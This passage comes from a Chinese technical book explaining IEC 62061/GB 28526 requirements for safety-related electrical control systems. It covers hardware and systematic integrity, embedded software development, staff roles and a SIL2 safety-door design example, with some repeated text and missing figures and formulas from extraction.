例外(对于6.3.2):就执行特定SRCF的子系统而言,如果硬件容错率为零且诊断试验率与需求率之比超过100,那么该子系统的诊断试验间隔应能使子系统满足危险随机硬件失效概率的要求。 6.3.3 故障反应功能作为SRCF的一部分被规定为SIL3,该故障反应功能导致机器停止,继而,通过SRECS的机器正常操作(例如使机器重新启动)将不可能进行,直到故障已经被修复或校正。对于规定的安全完整性等级低于SIL3的SRCF,故障反应功能(例如重启正常操作)执行后机器的行为应根据有关故障反应功能规范而定(见5.2.3)。 6.4 SRECS系统安全完整性要求 6.4.1 避免系统硬件失效的要求 6.4.1.1 应采取以下措施: a)SRECS应按照功能安全计划设计和执行(见4.2); b)子系统的适当选择、组合、安排、组装、安装(包括电线、电缆以及任何内部连接); c)按照制造商规范使用SRECS; d)使用制造商的应用说明书,如目录表、安装说明书和使用良好的工程惯例(见GB/T16855.2,D.1); e)使用具有可兼容操作特性的子系统(见ISO13849-2,D.1); f)SRECS应按照GB 5226.1予以保护; g)按照GB 5226.1规定防止功能接地的损失; h)不应使用未加说明的部件工作模式(例如可编程设备的“保留”寄存器); i)考虑可预见的误用、环境变化或更改。 6.4.1.2 另外,考虑到SRECS的复杂性和由SRECS执行这些功能需要的SIL,至少应采用下列一项技术和/或措施: a)SRECS硬件设计审查(例如检查或浏览):通过审查和/或分析,找出规范和执行之间的差异; b)咨询工具:能够进行模拟或分析的计算机辅助设计包和/或为执行系统程序设计使用的计算机辅助设计工具,该计算机辅助设计工具带可用的和已经测试过的预设计元素; c)模拟:按照子系统的性能和正确的规格及其交互作用,执行SRECS设计的系统性和完整性同一化。 6.4.2 系统性故障的控制要求 应采取下列措施: a)掉电的使用:SRECS设计应确保该功能,以使在失去供电时,可以达到或保持机器的安全状态。 b)控制临时子系统失效影响的措施:SRECS应按下列方式设计,如: ——单独子系统或子系统的一部分的电压变化(例如中断、电压降)不会导致危险(例如电压中断将影响电动机的电路,而不应在电源恢复时,造成意外启动)。 特别是过电压或欠电压应尽早查明,这样可以通过掉电程序或切换到第二个动力单元使所有输出可以转换到安全状态。 必要时,过电压或欠电压应尽早查明,内部状态可以保存在非易失性存储器中,这样,可以通过掉电程序使所有输出设置为安全状态,或者通过掉电程序或切换到第二个动力单元使所有输出可以转换到安全状态。 ——来自物理环境或子系统的电磁干扰影响不会导致危险。 c)控制任何数据通信过程产生的错误影响和其他影响的措施(包括传输差错、重复、删除、插入、重新排序、程序或数据残缺、延迟和假消息)。 d)当危险故障在某个界面出现时,在因该故障可能出现而造成的危险前,应执行故障反应功能。当使硬件容错率降低至零的故障发生时,故障反应应在估计的MTTR(见6.7.4.4.2g)超过时发生。 列项d)要求适用于子系统和子系统的所有其他部分的输入、输出界面(例如光幕的输出信号切换设备、防护装置位置传感器的输出),该子系统在集成时包含或者需要电缆连接。 4.2.1 安全相关电气控制系统选择或设计的一般要求 安全相关电气控制系统(SRECS)的选择或设计除要满足标准条款5.2和6.10规定的要求外,还要考虑标准中规定的其他适当要求。 通常来说,一个SRECS可能只有硬件,也可能包括硬件和软件两部分,那么无论是只靠硬件实现,还是需要靠软件、硬件共同实现,SRECS的系统构件(总体硬件、软件体系结构、传感器、执行元件、可编程电子器件、嵌入式软件、应用软件等)在选择或设计上都需要满足标准条款6.5规定的安全相关电气控制系统的选择要求和条款6.6规定的安全相关电气控制系统的设计和开发要求。除此之外,还要满足以下要求。 1. 硬件安全完整性要求 硬件安全完整性要求包括硬件安全完整性体系结构限制要求和危险随机硬件失效概率要求:硬件安全完整性体系结构限制要求主要是指结构上引起的对功能安全等级的限制,即一个SRECS的SIL应该小于或等于SRCF中任意一个子系统的最低SIL。例如,将两个安全完整性等级分别是SIL2和SIL3的子系统串联起来,只能得到SIL2的系统。危险随机硬件失效概率要求是指由危险随机硬件失效导致的各SRECS的危险失效概率应小于或等于安全要求规范规定的目标失效值。 2. 系统安全完整性要求 系统安全完整性要求包括避免系统硬件失效要求和系统性故障控制要求。 避免系统硬件失效采取的措施有:按照功能安全计划进行SRECS的设计;正确选择、组合、布置、装配和安装每个子系统(包括电缆、走线和任何元件之间的互联);按照工厂的规格要求使用SRECS;使用具有可兼容操作特性的子系统;按照工厂的应用指南中的安装使用说明和实际工程经验使用产品;对SRECS的电气防护应符合IEC 60204-1的要求;对功能接地的失效防护应符合IEC 60204-1的要求;严禁使用没有写入文档的元件运行模式,如可编程设备的预留存储区、可预见的误用、环境变化或更改等。 另外,考虑到由SRECS来执行功能的复杂性和SIL等级,至少应使用如下一项措施或者技术。 (1)SRECS硬件设计审查:通过审查和/或分析找出需求规范和实际设计之间的差异。 (2)使用计算机辅助设计工具进行打包、仿真或分析,或者利用其可靠且经过测试的预设模块进行自动化程序设计。 (3)仿真应按照设备的功能性、子系统的正确规格和互相影响对SRECS设计进行一个系统的、完整的同步。如果SRECS的控制功能可以在计算机上通过软件行为模块进行模拟,独立的子系统或每个子系统元素都有自己的动作和反应,那么我们就可以通过对每个子系统或子系统元素输入临界数据,查看其连接电路的反应来进行测试。 系统性故障的控制措施包括:SRECS应该在断电时,使得机器达到或者保持安全状态;SRECS应该保证在发生电压波动(电力中断或电压跌落)时,即使只是独立子系统或子系统的一部分出现电压波动,设备不会出现危险(动力电路断电后又恢复供电,电机驱动电路不得意外启动等)。另外,来自环境的电磁干扰也不得导致系统出现危险,应采取适当措施控制数据的错误影响和由数据传输导致的其他影响,包括传输错误、重复、删除、插入、重新排序、延迟和伪装等。当一个接口发生危险故障时,故障反应功能应该在这个故障导致的危险发生之前进行动作。当发生一个故障导致硬件故障容错率为0时,这个故障反应时间应该大于平均修复时间(Mean Time To Restoration,MTTR),从而保证在故障导致的危险发生之前被查出并修复。 3. 对故障检测SRECS行为的要求 在任何硬件故障容错率大于0的子系统中,危险故障的检测应该能引起指定故障反应功能执行;需求规范中允许将子系统的故障部分隔离并进行维修,机器可以继续安全运行。在这种情况下,如果故障部分没有在危险随机硬件失效概率计算出的最大评估时间内被修复,那么第二个故障反应应触发安全条件。对于SRECS可以在线修复的故障部分的隔离应该不会引起危险随机硬件失效;对于故障的发生能将硬件故障容错率减小到0,或者要求满足危险随机硬件失效概率的情况,诊断功能是必要的。而且,故障检测和相应的故障反应应该在危险情况发生之前进行。对于一个SIL3的SRCF,故障反应动作应该会导致设备停机,接下来由SRECS完成的常规操作(使机器重新启动等)将不能动作,直到故障被修复或调整好。对于小于SIL3的SRCF来说,故障反应动作之后的行为应视具体故障反应功能而定。 4. 安全相关软件设计和开发要求 安全相关软件设计和开发要求包括嵌入式软件设计和开发要求、参数化软件与应用软件的设计和开发要求。由于参数化软件与应用软件的设计和开发要求分别在标准条款6.11.2和6.11.3中有详细的论述,所以在这里只对嵌入式软件的设计和开发要求进行说明。 所谓嵌入式软件,是指由制造商提供的,在安全相关控制系统中不能被常规访问和更改的软件部分。在子系统中的嵌入式软件,应该符合IEC 61508-3中相应的SIL要求。 对于嵌入式软件的设计和开发,标准的附录C中也给出了指导,并通过以下8个部分对嵌入式软件的设计和开发进行了要求,分别是软件元素、开发过程、开发工具、复制和交付、确认和验证、通用确认和验证、确认和验证的审核及软件测试等。 1)软件元素 要开发出在SRECS或SRECS子系统中安全可靠的嵌入式软件,就要在整个开发周期中尽早地建立相关的组织和规则,对软件开发周期中的各种活动加以规范,主要包括以下几个方面。 (1)系统结构接口。 硬件结构对软件的要求(协议、格式、输入/输出频率、动作触发方式等)应该被明确地定义,并文档化。任何软/硬件对机器安全或系统监控的影响都要被列出来,必须经过设计评估,并在软件设计中加以考虑。 (2)软件规格。 ① 定性描述安全相关控制功能的性能原则、当时的要求(响应时间)及所有可能的偏差或余量。 ② 系统配置和结构。 ③ 对硬件安全的综合说明(逻辑解算器、传感器、执行器等)。 ④ 相关软件的综合说明。 ⑤ 对存储器容量和系统响应时间的要求。 ⑥ 人机接口。 ⑦ 对软件自我监控和软件监控的硬件说明。 ⑧ 对在系统工作时允许所有安全相关控制功能进行验证的说明(在线测试、瞬时信号的捕获时间、扫描频率等)。另外需注意:每个功能模块要求都要被明确定义,并明确模式转换时的状况。 (3)既有软件。 所谓既有软件,是指设计者为之前的项目所做的一些软件模块,或者一些已有的商务软件模块,如计算模块、数据分类算法模块等。在直接使用或引用这些模块时,设计者不能只考虑其符合之前的要求(做了哪些测试、有了哪些设计文档等),还应该根据本次项目的要求重新进行分析,使用此次项目的配置,与相关的部分一起进行验证,并纳入文档等。 (4)软件设计。 对软件设计的描述应包括以下内容。 ① 由具体配置决定的软件架构。 ② 组成软件架构的所有模块的输入/输出。 ③ 中断。 ④ 通用数据。 ⑤ 所有软件模块(输入/输出、算法、特殊设计等)。 ⑥ 使用的模块或数据库。 ⑦ 使用的既有软件。 同时,为了便于验证和维护,软件应该模块化编写,每个模块或模块组应该与具体的功能一一对应。模块间的接口,也要尽量简单。而且在编写过程中,也要尽量限制通用变量的数量和内容,并控制存储器中的数组和分布(避免数组溢出)。 (5)编码。 对软件设计的描述应满足以下内容。 ① 易读,易理解,方便测试。 ② 满足软件模块的设计要求。 ③ 遵守编码指导手册。 2)开发过程 对软件开发过程的要求,实际上就是对软件生命周期的要求。软件的整个生命周期都应该被明确并文档化,包括各种技术活动和必要阶段,每个阶段又都包含了基本的任务,如:输入(文档输入、标准输入等);输出(产生的文档、分析报告等);要执行的活动;要做的验证(分析和测试等)。 综上所述,软件开发过程应该包括以下内容。 (1)文档管理。 文档管理的相关内容参见IEC 62061的第10章。 (2)配置管理。 配置管理在任何开发过程中都是不可或缺的,它可能需要进行批准。事实上,只有当提供的配置能够识别时,该批准才有效。配置管理包括配置识别活动、更改管理、软件元素的存档和参看点的建立,以及辅助数据(文档、测试记录等)的管理。配置管理贯穿整个项目的生命周期。 (3)更改管理。 对软件所做的与SRECS功能安全相关的任何更改都要遵守在更改管理和配置管理中建立的规定,以便于与其前端进行交互,在不影响功能安全的前提下重新开始这一阶段的开发流程,并且在更改之前应说明原因,如功能安全水平低于指定值、系统故障经验、新的安全法规、机器或其用途的变动、整体安全要求的改动等。 (4)存档管理。 对所有配置和更改管理的过程都进行定义、记录并文档化,也就是存档管理。 存档管理至少应包括以下内容:配置管理的内容,如软件规格、基础和细节软件设计、源代码模块、计划、流程、验证测试的结果等;识别规则,如源模块的识别、软件版本的识别等;更改的处理,如要求的记录等。 3)开发工具 所谓开发工具,就是开发过程中使用的工具,如编译器、连接器、测试工具等,都要在文档中进行说明(要注明其名称、版本号等),并要与软件版本相对应。 4)复制和交付 软件的复制和交付包括两部分内容:一是在可执行代码的生成过程中,任何的可选项和变化都要进行记录,以便能够说清楚软件是什么时候生成的及如何生成的;二是软件在安装的过程中,与安全相关的控制功能的所有失效都要引起系统设计者的注意,都要进行记录和分析。 5)确认和验证 软件的确认和验证活动的目的是论证开发周期中的指定阶段是否符合前一阶段确立的要求,同时检测和统计软件开发中可能出现的错误等。软件的确认和验证不仅是一系列的测试,也要考虑其他一些活动,如审核、分析等。甚至在有些时候,在不适合进行测试时,这些审核和分析等可以代替测试。 6)通用确认和验证 分析人员应该能通过审查或采用软件开发不同阶段的专门技术对软件的符合性进行评估。软件生命周期中的所有技术都在评估范围之内,分析人员可以审查所有的验证报告和开发过程中的所有技术文档。软件的符合性评估应该针对具体的软件版本,对之前进行过评估并整改过的部分,需要重新评估,即分析人员只对最后版本进行评估。如果分析人员认为最终版本还需要进一步附加验证活动,则必须对之前的评估活动进行更新。 7)确认和验证的审核 分析活动验证了软件对规范的符合性。外部验证审核应该从验证结束的时候开始。每个审核的结果都要记录下来并存档,包括审核过程的所有活动清单、审核结论(是否进行下一项活动的结论)。同时,审核活动应受到监控。 8)软件测试 软件的测试主要有常规确认、软件规格验证、软件设计验证和细节设计验证。 (1)常规确认。 常规确认是对软件测试的常规要求,就是要在测试计划中给出一个测试的策略,要指明合适的测试方法、测试覆盖率、测试环境、具体用到的技术及测试成功的原则等。测试项目要适合软件的类型和具体因素。给出要进行的测试类型的接受原则,包括功能测试、限制测试、超限测试、性能测试、负载测试、外部设备失效测试、配置测试,也包括功能模式测试、安全相关的控制功能测试、每个元素的指定参数测试等;对于全新的软件版本,还包括非回归测试。 (2)软件规格验证。 软件规格验证也就是验证测试,主要是为了检测软件在目标系统环境中的错误。验证可以检测的错误有处理中断的不正确机构、运行时间要求的不充分方面、模式转换时软件的不正常响应时间、存储器中对不同数据源和组织问题的冲突访问、故障检测综合测试的缺乏、软/硬件接口错误、堆栈溢出等。 测试涵盖情况应该以跟踪矩阵的形式清晰列出,以保证规格中的每个元素,包括安全机制,都被验证测试涵盖;在任何操作模式下,软件的实时行为都可以被验证。 被记录在验证报告中的验证结果应该至少包括以下几个方面:被验证的系统和软件的版本号;进行的验证测试的描述(输入、输出、测试流程);用于验证或评估结果的工具和设备;明确给出的每个验证测试的结果(成功或失败);验证评估(明确不符合性、对安全的影响、是否接受验证的决定)。 这里要注意:验证报告应该记录每一个交付软件的版本号,并应该与每个交付软件元素的最终版本一致。 (3)软件设计验证。 软件设计验证就是软件的综合测试,关注的是软件模块的正确拼装和软件各组件之间的相互关系。设计验证通常被用来发现这样的错误:变量和常量的不正确初始化;参数的传递错误;数据变化,特别是通用数据的变化;事件和操作的不正确顺序等。最后,将这些测试的结果记录在案。 (4)细节设计验证。 细节设计验证就是模块测试,关注软件模块及它们对细节设计的符合性。对于大型的复杂软件,这个过程是必要的;但对于一般的小软件,只是建议采用。通过细节设计验证,应该能检测以下的错误类型:缺乏满足软件需求的算法、错误的循环操作、错误的逻辑结论、缺乏对正确输入数据有效组合的计算、对丢失/变更输入数据的错误响应、侵犯数组界限、计算顺序错误、不够精确、准确度或算法性能不符合要求。 每个软件模块都要用一系列测试来进行验证,并且输入数据,查看模块的执行功能。要将结果记录在案并进行归档。上述一些方式只是IEC 62061的附录C中明确的一些要求,具体执行时,还要考虑具体情况,建立、健全相关的管理制度,并严格按照标准中的规定执行,才能做出在性能和功能上都安全可靠的好软件。 4.2.2 安全相关电气控制系统选择或设计对人员的要求 安全相关电气控制系统的选择或设计除考虑上述要求外,还要考虑人的能力及分工情况,SRECS的设计与开发涉及的人员包括需求经理、软件设计师、软件实现者、软件测试员、软件验证者、软件集成者和软件确认者7个角色,他们的职责和技能要求如下。 1. 需求经理 职责:负责指定软件需求;制定软件需求规格说明书;建立和保持系统级需求的可追溯性;确保规格说明书、软件需求变更和配置管理;确保软件需求规格说明书的一致性和完整性(参考用户需求和最终的应用环境);形成和维护软件需求文档。 技能要求:具备需求管理的能力;在应用程序领域具有丰富经验;在应用程序领域安全性方面具有丰富经验;熟悉整个系统的所有角色和应用环境;了解分析技术和成果;理解适用的法规。 2. 软件设计师 职责:将具体的软件需求转换成满意的方案;制定自己的体系结构和相应的解决方案;制定或选择设计方法和支持工具;运用适当的设计规则和标准;在适当的地方开发组件规范;保持具体软件需求的可追溯性;开发和维护设计文档;确保设计文档的变更和配置管理。 技能要求:具备应用领域工程适应能力;懂得安全设计原则;具备设计分析方法和测试方法的能力;能够在给定的环境中遵循设计约束进行工作;具有良好的理解问题的能力;了解硬件平台、操作系统和接口系统的约束;了解标准的相关要求。 3. 软件实现者(编码人员) 职责:将设计方案转换成数据/源代码/其他设计表现;能够将源代码转化成可执行代码/其他设计表现;能够应用安全设计原则;能够运用指定的准备数据/编码标准;能够通过分析来验证中间结果;能够将软件整合到目标机器上;能够开发和维护实施文档,包括应用方法、数据类型和列表;能够保持设计的可追溯性;能够维护产生或修改的数据/代码变更和配置。 技能要求:具备应用领域工程适应能力;具备熟练运用实现语言和支持工具的能力;具备熟练运用指定的编码标准和编程风格的能力;了解硬件平台、操作系统和接口系统的约束;了解标准的相关要求。 4. 软件测试员 职责:有效地策划测试活动;开发测试规范(目标和用例);确保测试目标在软件需求规格说明书中的可追溯性及测试用例在指定测试目标中的可追溯性;确保测试计划的实施和指定测试的实现;识别偏离预期结果的差异并记录在测试报告中;与相关变化管理人员交流差异并进行评估和决策;在报告中捕获结果;能够选择软件测试设备。 技能要求:具备实施测试的能力,如软件需求分析、代码编写等;熟悉各种测试和验证方法/理论,并能够在给定内容情况下选择最适合的方法;具备根据给定规范编写测试用例的能力;具有分析思考能力和良好的观察技能;了解标准的相关知识。 5. 软件验证者 职责:能够开发软件验证计划,陈述需要验证的内容、验证过程(回顾、分析等)和测试类型;开发测试规范(目标和用例);确保测试目标在软件需求规格说明书中的可追溯性及测试用例在指定测试目标中的可追溯性;能够确保测试计划的实施和指定测试的实现;识别偏离预期结果的差异并记录在测试报告中;与相关变化管理人员交流差异进行评估和决策;在报告中分析结果。 技能要求:具备实施测试的能力,如软件需求分析、代码编写等;熟悉多种测试和验证方法/理论,并能够在给定内容情况下选择最适合的验证方法;具备根据给定规范编写测试用例的能力;具有分析思考能力和良好的观察技能;了解和掌握IEC 62061的相关要求。 6. 软件集成者 职责:能够使用软件标准来管理软件的一体化进程;能够依据设计者的组件规范和架构为软件组件开发和软/硬件集成测试规格说明书说明必要的输入组件、集成活动的顺序和组件的集成结果;能够在集成过程中开发和维护集成记录;能够发现集成异常现象,并记录和传达给相关的变更管理人员进行评估和决策;能够编写组件和整个系统的集成报告并说明集成结果。 技能要求:具备组件集成能力,包括熟悉相关的程序设计语言、软件接口、操作系统、数据、平台、代码等;熟悉多种集成方法/理论,并能够在给定内容的情况下选择最适合的集成方法;能够正确理解不同中间水平的设计和功能要求;能够根据一组集成功能得知集成测试的类型;从系统层次角度有良好的分析思考能力和观察能力;了解和掌握IEC 62061的相关要求。 7. 软件确认者 职责:对预期环境的应用软件有系统的理解;编写确认计划指定软件确认的基本任务和活动,并经评估者同意;针对预期环境检查软件需求;根据软件需求对软件进行检查,以保证软件满足需求;根据欧洲标准包括SIL要求评估软件进程和开发软件的一致性;检查软件的正确性、一致性及测试用例和执行用例的充分性;确保所有确认计划的实施;检查和对所有的偏差风险(影响)分类,记录和提交给负责变更管理的决策人员;对预期应用软件适应性做出评价,并适当地说明应用约束;根据确认计划寻找差异;在不同阶段对整个项目进行适当的审计、检查或审查(作为正常开发进程的实例化);结合以前的应用软件进行适当的检查和分析确认报告;检查开发方案,确保其在软件需求中是可追溯的;对相关的风险日志和遗留风险进行检查,并通过适当的消除方法或风险控制/转移方法保证所有的风险得到避免;形成确认报告;对软件的发布给出结论。 技能要求:具备实施能力;在应用软件的安全性方面有丰富经验;熟悉多种确认方法/理论,并能够在给定内容情况下选择最适合的确认方法;能够根据给定的规格说明书获得确认信息的类型;能够结合不同的来源和证据类型对应用软件的适用性或约束/限制形成一个整体的观点;具有良好的分析思考能力和观察能力;具有对软件整体的理解能力,包括对应用环境的理解;了解和掌握IEC 62061的相关要求。 4.2.3 安全相关电气控制系统选择或设计的其他要求 在SRECS的设计、开发、集成期间应考虑SRECS的可维护性和可测试性,并且保证不同活动阶段的执行结果都可以被验证。 最后,在进行SRECS诊断和故障反应功能设计时,应形成相应的设计文档,并对文档有如下要求。 ① 精确、完整和简明。 ② 适合预期目的。 ③ 可存取、可维护。 ④ 版本可控制。 4.3 安全相关电气控制系统的设计和开发 4.3.1 安全相关电气控制系统设计和开发的一般要求 【IEC标准条款】 6.6 Safety-related electrical control system (SRECS) design and development 6.6.1 General requirements 6.6.1.1 The SRECS shall be designed and developed in accordance with the SRECS safetyrequirements specification (see 5.2). 6.6.1.2 A clearly structured design process shall be followed and documented (see 6.6.2). 6.6.1.3 Where the use of diagnostics is necessary to achieve the required safety integrity when a fault is detected,the SRECS shall perform the specified fault reaction function (see 5.2 and 6.3). 6.6.1.4 Where a SRECS or part of a SRECS (i.e.its subsystem(s)) is to implement both SRCFs and other functions,then all its hardware and software shall be treated as safety-related unless it can be shown that the implementation of the SRCFs and other functions is sufficiently independent (i.e.that the normal operation or failure of any other functions do not affect the SRCFs). 6.6.1.5 For a SRECS or its subsystems that implements safety-related control functions of different safety integrity levels,its hardware and software shall be treated as requiring the highest safety integrity level unless it can be shown that the implementation of the safety-related control functions of the different safety integrity levels is sufficiently independent. 6.6.1.6 Interconnections (e.g.wiring,cabling) other than digital data communication shall be considered to be part of one of the subsystems to which they are connected (see also item d) of 6.4.2). 6.6.1.7 Where digital data communication is used as a part of a SRECS implementation it shall satisfy the relevant requirements of IEC 61508-2 in accordance with the SIL target(s) of the SRCF(s). 6.6.1.8 The information for use of the SRECS shall specify those techniques and measures necessary during the design life of the SRECS to maintain the safety integrity level. 【GB标准条款】 6.6 安全相关电气控制系统(SRECS)设计和开发 6.6.1 一般要求 6.6.1.1 SRECS应按照SRECS安全要求规范设计和开发(见5.2)。 6.6.1.2 应遵循明确的结构化设计过程并形成文件(见6.6.2)。 6.6.1.3 在检测出故障时,如果有必要使用诊断以达到要求的安全完整性,则SRECS应执行规定的故障反应功能(见5.2和6.3)。 6.6.1.4 如果SRECS或SRECS的一部分(即其子系统)既要执行SRCF,还要执行其他功能,那么应该认为其硬件、软件在安全上是相关的,除非它可以显示执行SRCF和其他功能之间是充分独立的(即正常操作或任何其他功能的失效不影响SRCF)。 6.6.1.5 对于执行不同安全完整性等级的安全相关控制功能的SRECS或其子系统,其硬件、软件应要求最高安全完整性等级,除非它能显示执行不同安全完整性等级的安全相关控制功能是充分独立的。 6.6.1.6 非数字数据通信的互联(例如电线、电缆)应被视为与其相连接的某个子系统的一部分(见6.4.2中d))。 6.6.1.7 当数字数据通信用作SRECS执行的一部分时,它应按照SRCF的SIL目标满足GB/T20438.2的有关要求。 6.6.1.8 SRECS的使用信息应规定SRECS设计年限所需的技术和措施,以保持其安全完整性等级。 在进行SRECS设计和开发时,应该遵循SRECS的安全要求规范,如SRCF功能要求规范和SRCF安全完整性要求规范。同时,SRECS的结构化设计还应形成相应的技术文档,以方便追溯。 在检测出故障时,如果有必要通过诊断的方式来达到要求的安全完整性等级,则应该在危险情况发生之前进行故障检测和得到相应的故障反应。对于一个安全完整性等级为SIL3的SRCF来讲,故障反应动作应该会导致设备停机,接下来由SRECS完成的常规操作(使机器重新启动等)将不能动作,直到故障被修复或调整好。对于安全完整性等级小于SIL3的SRCF来说,故障反应动作之后的行为应视具体情况而定。 当SRECS或其子系统的SRCF和其他功能要并行执行时,应该认为SRECS或其子系统的软/硬件在安全实现方面是相关的,除非有充分的证据表明执行的SRCF与其他功能模块之间没有任何的关系,即其他功能模块的失效并不影响执行的SRCF。 当SRECS或其子系统执行不同安全完整性等级的SRCF时,系统的软/硬件应该按照最高的安全完整性等级来设计,除非有充分的证据表明执行的不同安全完整性等级的SRCF没有任何关系,即其中一个SRCF的失效并不影响另外一个SRCF。 另外,电线、电缆等非数字数据通信的互联介质,应该当作子系统的一部分。 当数字数据通信子系统作为SRECS执行的一部分时,数字数据通信子系统应满足GB/T20438.2中规定的SRCF的SIL目标要求。 4.3.2 安全相关电气控制系统的设计和开发过程 【IEC标准条款】 6.6.2 Design and development process The design and development shall follow a clearly defined process that shall take into account all aspects covered by the process shown in Figure2. 6.6.2.1 System architecture design 6.6.2.1.1 Each SRCF as specified in the SRECS safety requirements specification shall be decomposed to a structure of function blocks,for example as shown in Figure3.This structure shall be documented comprising: -the description of the structure; -the safety requirements (functional,integrity) for each function block; -definition of inputs and outputs of each function block. 6.6.2.1.2 An initial concept for an architecture of the SRECS shall be created in accordance with the structure of the function blocks. 6.6.2.1.3 Each function block shall be allocated to a subsystem within the architecture of the SRECS.More than one function block may be allocated to one subsystem. 6.6.2.1.4 Each subsystem and the function blocks allocated to it shall be clearly identified. 6.6.2.1.5 The architecture shall be documented describing its subsystems and their interrelationship. 6.6.2.1.6 The safety requirements for each function block shall be as specified in the safety requirements specification of the corresponding SRCF in terms of -functional requirements (e.g.input information,internal operation (logic) and output of the function block); -safety integrity requirements. 6.6.2.1.7 The safety requirements for a subsystem shall be those of the function block(s) allocated to it.If more than one function block is allocated to a subsystem,then the highest integrity requirement applies (see 6.6.3).These requirements shall be documented as the subsystem safety requirements specification. 【GB标准条款】 6.6.2 设计和开发过程 设计和开发应遵照明确规定的程序,应考虑图2(本书图4-1)所示过程包含的所有方面。 6.6.2.1 系统结构设计 6.6.2.1.1 SRECS安全要求规范内规定的各个SRCF应分解成功能块结构,如图3(本书图4-2)所示。该结构应形成文档,包含下列内容: ——结构描述; ——各功能块安全要求(功能、完整性); ——各功能块输入和输出定义。 6.6.2.1.2 SRECS体系结构的初始概念应按照功能块结构创建。 6.6.2.1.3 各功能块应配置到SRECS体系结构内的子系统上。一个以上的功能块可以配置到一个子系统上。 6.6.2.1.4 每个子系统和为该子系统配置的功能块应能被清楚识别。 6.6.2.1.5 体系结构应设文档,描述其子系统和相互关系。 6.6.2.1.6 各功能块的安全要求应对应SRCF安全要求规范中的规定,依照: ——功能要求(如输入信息、内部操作(逻辑处理)和功能块输出); ——安全完整性要求。 6.6.2.1.7 子系统的安全要求应是为其配置的各个功能块的安全要求。如果为子系统配置多个功能块,那么最高的完整性要求适用(见6.6.3)。这些要求应形成文档并作为子系统安全要求规范。 下面用一个实例来说明SRECS设计和开发过程的工作流程,如图4-1所示。 下述SRECS设计实例帮助读者理解功能分解原则并学习按照标准条款的要求实现规定的安全相关控制功能。本实例是简单化的,不考虑在实践中可能要求的附加条件,如保持装置运转。 ▲图4-1 SRECS设计和开发过程的工作流程 ▲图4-2 子系统的功能块安全要求配置 总体来说,图4-3显示的功能分解术语是为了将设计过程描述成两个关键阶段。 (1)SRECS设计,可以由机器设计者或控制系统集成商执行。 (2)子系统(包括子系统元素)设计,适合电气设备和控制设备(接触器、联锁开关、可编程逻辑控制器等)的供应商、机器设计者或控制系统集成商执行。 图4-3 功能分解术语 本标准所使用的方法基于自上而下的结构化设计,以实现安全相关控制功能和这些功能的SRECS设计与开发。 1. 指定功能要求和安全完整性等级 本实例根据SRCF安全要求规范指定功能要求和安全完整性要求。在本实例中,功能要求为,如果安全门开启,那么轴转速不得高于指定速度;安全完整性等级为SIL2。 2. SRECS的设计与开发过程 (1)安全要求规范中所规定的安全相关控制功能被分解为功能块结构,每个功能块都应形成相应的文档,文档内容有对功能块结构的描述、每个功能块的功能要求和安全完整性要求等。 分解过程应面向全面描述SRCF的功能和安全完整性要求的功能块结构,它允许将各功能块确定的功能和安全完整性要求配置到各子系统。在该场合下,将功能块的完整功能要求配置到子系统是可能的。然而,虽然将多个功能块配置到单一子系统是可能的,但不可能将一个功能块配置到几个具有单独功能和安全完整性要求的子系统中。 根据上面提到的功能要求,建议:利用传感器来感应安全门的位置及轴转速,感应输出信号通过逻辑方法进行处理,当轴转速过高且安全门没有关闭时,可以关闭电机电源,从而断开与起动机的连接。 (2)SRECS体系结构的初始概念应按照功能块结构创建。各功能块的安全要求来自相应的安全相关控制功能的安全要求。 实现各功能块的要素必须至少达到分配给SRCF的相同SIL能力,图4-4为SRECS体系结构的初步概念。 3. 子系统的设计与开发 每个功能块被分配到SRECS的子系统中,各子系统都由子系统元素和诊断功能(需要时)构成,以确保能检测出故障,并采取适当的行动。 每个子系统和为该子系统配置的功能块都应该被清楚地标识出来。 值得注意的是,当子系统需要配置多个功能块时,功能块要以最高的安全完整性等级为准,这些要求都要形成相应的记录文档并作为子系统的安全要求规范。 另外,体系结构应以子系统的术语和子系统间的相互关系来描述SRECS。就本实例而言,有若干方案可用于实现SRECS及其子系统结构。下面用两个方案进行说明。 方案1:如图4-5所示,各子系统内嵌诊断功能。 ▲图4-4 SRECS体系结构的初步概念 ▲图4-5 各子系统(SS1~SS4)内嵌诊断功能 如图4-5所示,子系统(SS1~SS4)实现的功能块,是SRECS顶层体系结构中的元素,其中任何一个子系统失效都将导致安全相关控制功能的失效。子系统元素(SSE)是分配到子系统的功能块部件。诊断功能(D)被视为独立的功能,可以拥有独立于安全相关功能的结构,可以通过以下方式执行:在子系统内部;通过SRECS中的其他子系统;通过SRECS以外的子系统。 方案2:如图4-6所示,诊断功能嵌入SS3中的可编程逻辑控制器(PLC)中,PLC满足GB/T20438相关方面的要求。 图4-6 子系统SS3内嵌诊断功能 4. 由SRECS实现的SIL评估 SRECS要求SIL应小于或等于任何子系统的SILCL最低值。SRECS每小时危险失效概率(PFHDSRECS)是所有执行安全相关控制功能的子系统每小时危险失效概率(PFHD1~PFHD)的总和,在适当的场合还应包括数字数据通信过程中的危险传输错误概率P:SRECS要求SIL应小于或等于任何子系统的SILCL最低值。SRECS每小时危险失效概率(PFHDSRECS)是所有执行安全相关控制功能的子系统每小时危险失效概率(PFHD1~PFHD)的总和,在适当的场合还应包括数字数据通信过程中的危险传输错误概率P:SRECS要求SIL应小于或等于任何子系统的SILCL最低值。SRECS每小时危险失效概率(PFHDSRECS)是所有执行安全相关控制功能的子系统每小时危险失效概率(PFHD1~PFHD)的总和,在适当的场合还应包括数字数据通信过程中的危险传输错误概率P: nTEnTEnTE 对于此实例来说,安全相关控制功能的目标失效值是SIL2,根据标准条款5.2.4.2可知,SIL2相当于10-7≤PFHD≤10-6。因此,假设子系统每小时危险失效概率如图4-7所示,那么所有子系统每小时危险失效概率的总和即可以评估。 图4-7 SRECS的PFHD评估 因此,在此实例中,可以得出SRECS在SIL2上的设计满足实现安全相关控制功能所有要求的结论。关于SRECS安全完整性评估的要求在下一节(4.3.3节)中将详细介绍。 4.3.3 安全相关电气控制系统的安全完整性评估要求 【IEC标准条款】 6.6.3 Requirements for the estimation of the safety integrity achieved by a SRECS 6.6.3.1 General The SIL that can be achieved by the SRECS shall be considered separately for each SRCF tobe performed by the SRECS. The SIL that can be achieved by the SRECS shall be determined from the probability of dangerous random hardware failure,architectural constraints,and systematic safety integrity of the subsystems that comprise the SRECS.The SIL that is achieved is less than or equal to the lowest value of the SILCLs of any of the subsystems for systematic safety integrity and architectural constraints. 6.6.3.2 Hardware safety integrity 6.6.3.2.1 The probability of dangerous failure of each SRCF due to dangerous random hardware failures shall be equal to or less than the target failure value as specified in the safety requirements specification. 6.6.3.2.2 The 